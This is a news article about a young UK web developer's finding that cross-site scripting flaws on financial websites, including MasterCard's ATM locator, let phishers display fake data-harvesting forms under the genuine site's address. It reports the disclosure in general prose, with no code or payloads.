Leading financial institutions have adopted a more-aggressive attitude toward online identity-theft cons known as "phishing scams" in recent months. But companies could be unwittingly helping phishers trick online shoppers, says a new report from a U.K. Web developer.

A test of leading financial services Web sites, including those run by MasterCard, NatWest and Reuters Group, revealed that many sites have loosely protected features that scam artists can use to mask their own malicious Web sites, hijacking the names and Web addresses of established institutions, says Sam Greenhalgh, the 19-year-old who operates Web site Zapthedingbat.com.

Greenhalgh is responsible for discovering a vulnerability in Microsoft's Internet Explorer Web browser known as the "%01" vulnerability. That security hole, since closed by Microsoft, has been widely used in scams to disguise the location of phishing Web sites, which online scam artists use to harvest sensitive personal and financial information from their victims. He published a report at zapthedingbat.com on his latest findings. The security lapses at major financial sites are not caused by flawed Microsoft products, Greenhalgh says. Indeed, the trick works with most popular Web browsers. Instead, poorly designed and unsecure features on leading Web sites that contain cross-site scripting vulnerabilities are to blame.

Greenhalgh uses the example of the ATM locator feature on MasterCard's Web site. The feature was designed to help people find cash machines that accept MasterCard. Users input a location, including a country and street address, and the Web site provides the location of cash machines in the area. However, because of a cross-site scripting vulnerability in the feature, Greenhalgh injected his own HTML into the fields used by the ATM locator, causing the mastercard.com site to display his content, including a mock form that could be used to harvest information. With the Web browser address bar reading "http://www.mastercard.com" and the MasterCard logo adorning the page, even sophisticated Web surfers would be hard-pressed to prove that they were not interacting with the credit card company instead of scam artists, Greenhalgh says. MasterCard declined to comment for this story.